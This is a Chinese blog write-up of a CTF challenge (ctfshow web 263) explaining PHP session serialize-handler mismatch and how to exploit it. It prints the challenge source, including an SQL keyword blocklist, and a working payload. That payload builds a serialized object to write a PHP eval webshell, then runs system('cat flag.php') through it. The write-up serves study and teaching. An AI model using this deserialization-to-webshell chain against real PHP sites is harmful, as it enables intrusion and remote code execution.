ctfshow web入门 反序列化 263

已于 2023-04-08 16:05:07 修改
阅读量1.7k 收藏 2
点赞数 1
分类专栏: ctfshow 文章标签: 前端 php 开发语言 经验分享
于 2023-04-08 16:02:07 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64815693/article/details/130029366
版权

因为这个,可能讲的要稍微多一点,所以单独另起一篇

基本

题目主要是session反序列化

我们主要了解这里就可以了

session.serialize_handler的引擎有看下面。
注:php_serialize是从5.5.4开始使用的。

处理器名称存储格式
php键名 + 竖线 + 经过serialize()函数序列化处理的值
php_binary键名的长度对应的 ASCII 字符 + 键名 + 经过serialize()函数序列化处理的值

php_serialize

经过serialize()函数序列化处理的数组

处理器-php

<?php

highlight_file(__FILE__);
ini_set('session.serialize_handler', 'php');
session_start();
$_SESSION['session'] = $_GET['session'];
var_dump($SESSION);

我们访问网页,通过session参数传入一个2,他会在一个tmp的文件夹下面生成一个文件。

那么怎么找到这个文件呢,毕竟每一个人的路径肯定有区别的,这里我们可以Everything这个工具来搜索sess_,就可以知道路径了,接下来我们看看生成了什么。

//生成的
session|s:1:"2";

竖杠的左边是他的键名,右边是他的键值。
也正是键名 + 竖线 + 经过serialize()函数序列化处理的值

处理器-php_binary

<?php

highlight_file(__FILE__);
ini_set('session.serialize_handler', 'php_binary');
session_start();
$_SESSION['session'] = $_GET['session'];
var_dump($SESSION);

这里就是我们使用的代码,然后传入2,这里修改了一下PHPSESSID为aaa,然后就会生成一个sess_aaa的文件。

//生成的
sessions:1:"2";

session前面是还有一个字符因为不可见的缘故大家看不到。

处理器-php_serialize

<?php

highlight_file(__FILE__);
ini_set('session.serialize_handler', 'php_serialize');
session_start();
$_SESSION['session'] = $_GET['session'];
var_dump($SESSION);

老样子输入一个2,它里面文件的内容是

a:1:{s:7:"session";s:1:"2";}

这里php_serialize在内部简单地直接使用 serialize/unserialize函数,他是会自动进行反序列化这就是我们需要利用的。

这里写两个来进行举例 :

这里使用这两个

<?php

highlight_file(__FILE__);
ini_set('session.serialize_handler', 'php_serialize');
session_start();
$_SESSION['session'] = $_GET['session'];
var_dump($SESSION);

<?php
highlight_file(__FILE__);

ini_set('session.serialize_handler', 'php');
session_start();

class A
{
    public $a;
    public function __destruct()
    {
        echo($this->a);
    }
}

我们这里写一串序列化的东西,看看下面那个是否会输出phpinfo()

O:1:"A":1:{s:1:"a";s:9:"phpinfo()";}

首先我们在上面那个传入

?session=|O%3A1%3A%22A%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bs%3A9%3A%22phpinfo()%22%3B%7D

记住这里要加竖杠,因为第二个文件的解释器是php,我们要让前面成为键名,后面是键值,让他只解析后面的序列化好的字符串,然后这里他会写入一个PHPSESSID里面,我们带着这个一个去访问下面那个文件。

 这里我们看到属性a没有任何赋值,但是最后确实是输出了phpinfo().

我们去看看生成的文件,里面的内容是怎么样的。

a:1:{s:7:"session";s:37:"|O:1:"A":1:{s:1:"a";s:9:"phpinfo()";}

php_serialize处理器是进行了一次php序列化,但是我们传入了一个|,在php处理器的理解是

这三部分

a:1:{s:7:"session";s:37:"  //键名,这个是不解析的

|  //分隔符

O:1:"A":1:{s:1:"a";s:9:"phpinfo()";}  //键值

题目

这里刚进去没有发现什么东西,这里通过dirsearch扫目录发现有www.zip

//index.php
<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-03 16:28:37
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-06 19:21:45
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/
	error_reporting(0);
	session_start();
	//超过5次禁止登陆
	if(isset($_SESSION['limit'])){
		$_SESSION['limti']>5?die("登陆失败次数超过限制"):$_SESSION['limit']=base64_decode($_COOKIE['limit']);
		$_COOKIE['limit'] = base64_encode(base64_decode($_COOKIE['limit']) +1);
	}else{
		 setcookie("limit",base64_encode('1'));
		 $_SESSION['limit']= 1;
	}
	
?>


<!DOCTYPE html>
<html>
<head>
	<meta charset="UTF-8">
	<meta http-equiv="X-UA-Compatible" content="IE=edge">
	<meta name="viewport" content="initial-scale=1,maximum-scale=1, minimum-scale=1">
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<meta name="apple-mobile-web-app-capable" content="yes">
	<meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no">
	<title>ctfshow登陆</title>
	<link href="css/style.css" rel="stylesheet">
</head>
<body>

	<div class="pc-kk-form">
		<center><h1>CTFshow 登陆</h1></center><br><br>
		<form action="" onsubmit="return false;">
			<div class="pc-kk-form-list">
				<input id="u" type="text" placeholder="用户名">
			</div>
			<div class="pc-kk-form-list">
				<input id="pass" type="password" placeholder="密码">
			</div>
			
			<div class="pc-kk-form-btn">
				<button onclick="check();">登陆</button>
			</div>
		</form>
	</div>


	<script type="text/javascript" src="js/jquery.min.js"></script>

	<script>

		function check(){
			$.ajax({
			url:'check.php',
			type: 'GET',
			data:{
				'u':$('#u').val(),
				'pass':$('#pass').val()
			},
			success:function(data){
				alert(JSON.parse(data).msg);
			},
			error:function(data){
				alert(JSON.parse(data).msg);
			}

		});
		}


	</script>

</body>
</html>

因为check.php,这里 require_once 'inc/inc.php';,所以我们去查看inc/inc.php

//check.php
<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-03 16:59:10
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-06 19:15:38
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

error_reporting(0);
require_once 'inc/inc.php';
$GET = array("u"=>$_GET['u'],"pass"=>$_GET['pass']);


if($GET){

	$data= $db->get('admin',
	[	'id',
		'UserName0'
	],[
		"AND"=>[
		"UserName0[=]"=>$GET['u'],
		"PassWord1[=]"=>$GET['pass'] //密码必须为128位大小写字母+数字+特殊符号,防止爆破
		]
	]);
	if($data['id']){
		//登陆成功取消次数累计
		$_SESSION['limit']= 0;
		echo json_encode(array("success","msg"=>"欢迎您".$data['UserName0']));
	}else{
		//登陆失败累计次数加1
		$_COOKIE['limit'] = base64_encode(base64_decode($_COOKIE['limit'])+1);
		echo json_encode(array("error","msg"=>"登陆失败"));
	}
}

#inc/inc.php
<?php
error_reporting(0);
ini_set('display_errors', 0);
ini_set('session.serialize_handler', 'php');
date_default_timezone_set("Asia/Shanghai");
session_start();
use \CTFSHOW\CTFSHOW; 
require_once 'CTFSHOW.php';
$db = new CTFSHOW([
    'database_type' => 'mysql',
    'database_name' => 'web',
    'server' => 'localhost',
    'username' => 'root',
    'password' => 'root',
    'charset' => 'utf8',
    'port' => 3306,
    'prefix' => '',
    'option' => [
        PDO::ATTR_CASE => PDO::CASE_NATURAL
    ]
]);

// sql注入检查
function checkForm($str){
    if(!isset($str)){
        return true;
    }else{
    return preg_match("/select|update|drop|union|and|or|ascii|if|sys|substr|sleep|from|where|0x|hex|bin|char|file|ord|limit|by|\`|\~|\!|\@|\#|\\$|\%|\^|\\|\&|\*|\(|\)|\(|\)|\+|\=|\[|\]|\;|\:|\'|\"|\<|\,|\>|\?/i",$str);
    }
}


class User{
    public $username;
    public $password;
    public $status;
    function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }
    function setStatus($s){
        $this->status=$s;
    }
    function __destruct(){
        file_put_contents("log-".$this->username, "使用".$this->password."登陆".($this->status?"成功":"失败")."----".date_create()->format('Y-m-d H:i:s'));
    }
}

/*生成唯一标志
*标准的UUID格式为:xxxxxxxx-xxxx-xxxx-xxxxxx-xxxxxxxxxx(8-4-4-4-12)
*/

function  uuid()  
{  
    $chars = md5(uniqid(mt_rand(), true));  
    $uuid = substr ( $chars, 0, 8 ) . '-'
            . substr ( $chars, 8, 4 ) . '-' 
            . substr ( $chars, 12, 4 ) . '-'
            . substr ( $chars, 16, 4 ) . '-'
            . substr ( $chars, 20, 12 );  
    return $uuid ;  
}

 这里我们分析一下,首先看看index.php这里有一个问题就是session,我们可以自己定义,然后这里还是存在session_start(),这里php的版本是7.3.11,所以就是默认就是ini_set('session.serialize_handler', 'php_serialize');

	if(isset($_SESSION['limit'])){
		$_SESSION['limti']>5?die("登陆失败次数超过限制"):$_SESSION['limit']=base64_decode($_COOKIE['limit']);
		$_COOKIE['limit'] = base64_encode(base64_decode($_COOKIE['limit']) +1);
	}else{
		 setcookie("limit",base64_encode('1'));
		 $_SESSION['limit']= 1;
	}

然后看到check.php,注意这里他是有加载inc.php的

require_once 'inc/inc.php';

这里看到inc.php,注意这里,他是设定成了php,所以结合上面php_serialize,在结合我们可以控制session,还有下面User类中的username和password,这里还可以进行任意文件写入,嘿嘿嘿,整条思路不就有了吗。

ini_set('session.serialize_handler', 'php');

class User{
    public $username;
    public $password;
    public $status;
    function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }
    function setStatus($s){
        $this->status=$s;
    }
    function __destruct(){
        file_put_contents("log-".$this->username, "使用".$this->password."登陆".($this->status?"成功":"失败")."----".date_create()->format('Y-m-d H:i:s'));
    }
}

首先我们先去生成exp

//payload
<?php
class User{
    public $username="1.php";
    public $password='<?php eval($_POST[a]);?>//';
}

echo urlencode(base64_encode(serialize("|".serialize(new User))));
//1.index.php
cookie传:limit=czo5MjoifE86NDoiVXNlciI6Mjp7czo4OiJ1c2VybmFtZSI7czo1OiIxLnBocCI7czo4OiJwYXNzd29yZCI7czoyNjoiPD9waHAgZXZhbCgkX1BPU1RbYV0pOz8%2BLy8iO30iOw%3D%3D

//2.带着cookie去访问check.php

//3.访问log-1.php
post传:a=system('cat flag.php');

//4.查看源代码获得flag
练习两年半的篮球选..哦不对安全选手
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
CTFshow 反序列化 web263
Kradress的博客
12-20 1281
目录源码思路题解总结 源码 也没有什么别的信息,扫一下目录,下载www.zip拿到源码 思路 知识点: php在session存储和读取时,都会有一个序列化和反序列化的过程,PHP内置了多种处理器用于存取$_SESSION数据,都会对数据序列化和反序列化,源码中有session_start的时候会读取session,从而进行反序列化. php . ini 中默认 session.serialize_handler 为 php_serialize,而 index.php 中将其设置为 php ,这个差
[ctfshow]web入门——反序列化web261+web264-web267)
ShenZ的博客
03-02 6238
[ctfshow]web入门——反序列化 反序列化 unserialization [ctfshow]web入门——反序列化 web261 web264 str_replace字符串覆盖逃逸 web265 web266 web267 yii系列 反序列化 unserialization[ctfshow]web入门——反序列化
CTFshow 反序列化 web254
Kradress的博客
12-19 266
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-12-02 17:44:47 # @Last Modified by: h1xa # @Last Modified time: 2020-12-02 19:29:02 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ error_reporting(0); highlight
Ctfshow 反序列化
qq_74806534的博客
03-17 1568
SSTI和SQL注入原理差不多,都是因为对输入的字符串控制不足,把输入的字符串当成命令执行。SSTI就是服务器端模板注入SSTI也是,其成因其实是可以类比于sql注入的。sql注入是从用户获得一个输入,然后后端脚本语言进行数据库查询,所以可以利用输入来拼接我们想要的sql语句,当然现在的sql注入防范做得已经很好了,然而随之而来的是更多的漏洞。SSTI也是获取了一个输入,然后在后端的渲染处理上进行了语句的拼接,然后执行。当然还是和sql注入有所不同的,
ctfshow web入门反序列化263——学习session的两种存储方式
qq_45766062的博客
09-14 755
一. 题目分析: 跑dirsearch发现有个www.zip压缩包,是网站的源码,通过源码分析,我先梳理解题思路: (1)首先访问首页,建立session,并获得cookie。 (2)然后将cookie修改为反序列化字符串 (3)访问check.php实现反序列化shell的写入 (4)访问log-1.php,获取flag 废话不多说直接上exp: <?php class User{ public $username; public $password; public $sta
ctfshow-反序列化
最新发布
m0_72898152的博客
02-17 822
ctfshow、反序列化
CTFSHOW WEB入门反序列化
Npceer-一位网安初学者的博客
03-01 1170
最近特别懒 等开学在高强度更新其他几篇 不会写太细 反序列化入门文章找Y4爷爷 反序列化web254web255 web254 直接传 username=xxxxxx&password=xxxxxx web255 首先和254一样 传username和password 然后是需要cookie验证VIP身份 抓包构造 注:需要对分号进行url编码 引号好像不用 我当时瞎搞的 ...
CTFshow 反序列化 web267
Kradress的博客
02-11 1180
目录思路题解总结 思路 进去是一个网页,在login页面试了下密码,发现是admin:admin,成功登录,但发现没什么改变 一个个页面查看源代码,最后再about页面中发现提示 访问?r=site%2Fabout&view-source拿到提示 ///backdoor/shell unserialize(base64_decode($_GET['code'])) 刚开始不知道怎么去用,后面想到%2F就是/,尝试了下r=/backdoor/shell,提示要加上参数,然后思路又断了,应该是信
ctfshow-web入门-反序列化(前篇)
ccfly1012的博客
10-24 6044
目录 web254 web255 web256 web257 web258 web259 web260 web261 web262 web263 web264 web265 web266 web267 web254 <?php ​ /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-12-02 17:44:47 # @Last Modified by: h1xa # @Last Modified t..
ctfshow web入门 序列化
Lumos427的博客
02-25 1530
序列化和反序列化 web254 <?php error_reporting(0); highlight_file(__FILE__); include('flag.php'); class ctfShowUser{ public $username='xxxxxx'; public $password='xxxxxx'; public $isVip=false; public function checkVip(){ return $this-&gt
CTFshow——反序列化
D.MIND 的博客
02-28 1334
前言:  Bit师傅的:php反序列化详解  Y4师傅的:[CTF]PHP反序列化总结 文章目录web254——小热身web255——web256——web257——web258——加号绕过正则: `/[oc]:\d+:/i`web259——SoapClient与CRLF组合拳web260—— web254——小热身 直接?username=xxxxxx&password=xxxxxx即可,哈哈 web255—— <?php error_reporting(0); highlight_fil
ctfshow—反序列化
cosmoslin的博客
11-15 2133
简介 序列化其实就是将数据转化成一种可逆的数据结构,自然,逆向的过程就叫做反序列化php 将数据序列化和反序列化会用到两个函数 serialize 将对象格式化成有序的字符串 unserialize 将字符串还原成原来的对象 序列化的目的是方便数据的传输和存储,在PHP中,序列化和反序列化一般用做缓存,比如session缓存,cookie等。 常见的魔术方法 __construct(),类的构造函数 __destruct(),类的析构函数 __call(),在对象中调用一个不可访问方法时调用
CTFshow-反序列化
qq_61376069的博客
01-29 521
CTFshow入门反序列化。 加号绕过正则: /[oc]:\d+:/i;
ctfshow 反序列化
..
03-07 3480
web254 读代码后发现题目要求传入的值等于类里面的值 ?username=xxxxxx&password=xxxxxx web255 这里的话得有点改变,得让$this->返回的值为true,所以得构造一下链子如下 <?php class ctfShowUser{ public $isVip; public function __construct(){ $this->isVip=true; } } $a=new ctfShowUser()...
CTFSHOW 反序列化
ing_end的博客
04-09 1959
反序列化 为什么要序列化 class 类 实验室成员 obj 对象(是一种语言结构,一个对象就是一个变量)某一个成员 特征(成员变量) 性别,姓名。。。。。。 方法(动作) 思考,听课,下课。。。。。。 百度百科上关于序列化的定义是,将对象的状态信息转换为可以存储或传输的形式的过程。在序列化期间,对象将其当前状态写入到临时或持久性存储区。以后,可以通过从存储区中读取或反序列化对象的状态,重新创建该对象。 简单的说,序列化就是把一个对象变成可以传输的字符串,可以以特定
CTFSHOW反序列化
qq_45694932的博客
09-11 200
CTFSHOW web258 反序列化 正则匹配 class ctfShowUser{ public $username='xxxxxx'; public $password='xxxxxx'; public $isVip=false; public $class = 'info'; public function __construct(){ $this->class=new info(); } public functio
CTFshow 反序列化
starttv的博客
12-09 783
​Session​一般称为“会话控制“,简单来说就是是一种客户与网站/服务器更为安全的对话方式。一旦开启了session​ 会话,便可以在网站的任何页面使用或保持这个会话,从而让访问者与网站之间建立了一种“对话”机制。不同语言的会话机制可能有所不同,这里仅讨论​机制。​​可以看做是一个特殊的变量,且该变量是用于存储关于用户会话的信息,或者更改用户会话的设置,需要注意的是,​ 变量存储单一用户的信息,并且对于应用程序中的所有页面都是可用的,且其对应的具体session​ 值会存储于服务器端,这也是与。
ctfshow--反序列化
qq_51684648的博客
03-15 3150
ctfshow反序列化篇(255-271) 255、 class ctfShowUser{ public $isvip=true; } $a=new ctfShowUser(); echo urlencode(serialize($a)); get传两个参数username=xxxxxx&password=xxxxxx burp抓包,cookie传参user(分号在cookie中不会被正确的上传到服务器,所以需要url编码): 256、 <?php Class ctfShowUse
ctfshow反序列化
09-09
引用中的代码展示了一个类`ctfshow`,其中包含了一个`__destruct`方法,该方法在对象被销毁时会输出一个变量`$flag`的值。该类的序列化结果被输出并展示了如何利用`__destruct`方法来获取`$flag`的值。 引用中的代码展示了另一个类`ctfshowvip`,其中`password`属性被设置为包含恶意代码的字符串,利用`__destruct`方法中的弱比较漏洞,可以构造一个恶意的序列化payload来执行任意代码。 引用中的代码展示了一个修改后的类`ctfShowUser`,其中通过构造函数将`isVip`属性设置为`true`。通过构造一个链式调用,可以构造一个序列化的payload来实现`$this->isVip`值为`true`的反序列化攻击。 综上所述,ctfshow的反序列化攻击可以通过构造恶意的序列化payload来利用`__destruct`方法或弱比较漏洞来执行任意代码或获取敏感信息。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

练习两年半的篮球选..哦不对安全选手

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值